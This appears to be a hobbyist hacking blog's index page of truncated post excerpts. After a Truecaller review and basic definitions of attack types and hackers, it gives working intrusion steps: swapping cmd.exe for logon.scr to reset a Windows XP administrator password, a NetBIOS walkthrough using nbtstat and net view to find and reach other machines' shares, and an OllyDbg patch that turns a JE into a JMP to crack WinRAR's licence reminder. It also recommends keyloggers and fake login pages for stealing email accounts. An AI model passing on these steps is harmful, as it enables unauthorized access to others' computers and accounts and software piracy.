Posts

True Caller

Image
If you are looking for an app for India which act an an global telephone directory than your search ends with true caller.Its a reverse phone lookup app which actually works.It is an app available for android,iphone,blackbarry,symbian which can trace name and address of unknown caller.It also have the ability to block the number, it will instantly display caller name from incomming or outgoing calls and messages. You can also link ur facebook,twitter and linkedin profile to this app so you can get their profile pic and  staus update when they call you.All u need is an internet (3G/2G/wifi) connected device. But thers a catch..... You might be wondering, how it works? Its database is made from millions of its cloud connected users.It covertly upload ur contact to its cloud server so that other users can also search for numbers you know.So its a give and take policy. You can download it from respective Market place like google play for android.Just search for True caller in the mar

Hacking Attacks

Computer connected to internet are vulnerable top variety of exploits.System can be subjected to denial of service attacks that prevent other computers from connecting to them or prevent others computer from connecting to other computers on the internet.These attacks can cause them to cease operations either temporarily or permanently. Some of these attacks use vulnerability available in the third party components used by websites, such as shopping cart software.Other attacks have used vulnerabilities which are common in any web application such as SQL injection or XSS(Cross Site Scripting). Types of Attack There are two types of attack: Non technical attack Social Engineering attack Pretexting Phishing Smishing Vishing Tabnabbing Technical Attack DOS attack  Input Validation Attack Keyloggers Attack Sniffing Attack

Who is a hacker?

Definition of Hacker: A hacker is a person who breaks into computers and computer networks, either for profit or motivated by the challenge.----Wikipedia. There are 3 catagories of hacker: 1) White Hat 2) Black hat 3) Grey Hat White hat hackers are the Good guys who don't use their skill for illegal purpose. Black Hat hacker are the bad guys who use their skill for illegal purpose, They use their skill maliciously  for personal gain. Grey hat hacker are combination of black and white hat, they hack into system for solely notifying that system has been hacked. Script kiddies – These are the wannabe hackers. They are the people that make hackers look bad. they do not  have any hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes. Intermediate hackers – These people know about computers and have enough computing skill to understand what a script can do. But like script Kiddies, they use tools and exploit

How to Hack Email

Facts about email hacking.......... 1. There is no ready made software that can hack emails and get you the password just with a click of a button. 2. Never trust any email hacking service that claims to hack any email. Most of them are no more than a scam. 3. There exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.  A.)Keylogger  B.)Fake login page  1.KEYLOGGER It is a small piece of software which reside on your pc and silently monitor each keystroke thats a user type on a typical computer keyboard. 2.FAKE LOGIN PAGE A fake login page is a page which looks alike the login page of a site. And if anyone logs in through the fake login page, his/her account information is logged in a file and the hacker or the creator of the fake login page retrieves that information.

Windows Hacking

WINDOWS TIPS COLLECTION How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this chan

SYSTEM INTRUSION IN 15 SECONDS

This is called a Netbios attack. Nbstat –A EX: nbstat –A 192.168.1.4 It check connection status of an ip address, scan on a range of IP address for systems with “File and Printer Sharing” turned on. This will give you a result that looks like this NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------------- J-1 <00> UNIQUE Registered WORK <00> GROUP Registered J-1 <03> UNIQUE Registered J-1 <20> UNIQUE Registered WORK <1E> GROUP Registered WORK <1D> UNIQUE Registered A hex code of <20> means you have file and printer sharing turned on. The next step would be to find out what is being shared. This is how: Net view \\ EX:net view \\192.168.1.4 We get a response that looks something like this. Shared resources at \\192.168.1.4 Sharename               Type Comment MY DOCUMENTS           Disk TEMP                         Disk The command was completed successfully. This show

HOW TO CRACK WINRAR USING OLLYDBG

Winrar always show us a reminder saying “Please purchase Winrar licence” at the every startup of winrar, it’s irritating. It notify our trial/ evaluation period. It can be patch using ollydbg. I will tell u how.   Open ollydbg and open winrar in it. Now search for text string. “Reminder”. To do so right click in olldbg and search for All referenced text sting. A new window [Text strings referenced in winRAR::text] will open, right click on in that and click Search for text .Now a search box open enter reminder there. Now that we got that code that display REMINDER, double click on that it will take u to the mian program code. Now look for jump just before the code starts. There is jump JE SHORT 00441219,if we follow the jump lets see where it goes, to do this simply press Enter on the jump. Lets change jump from JE SHORT 00441219 to JMP SHORT 00441219 so that it noe becomes JUMP instead of JUMP EQUAL. To do that double click on that statement and change it. Then click Assembl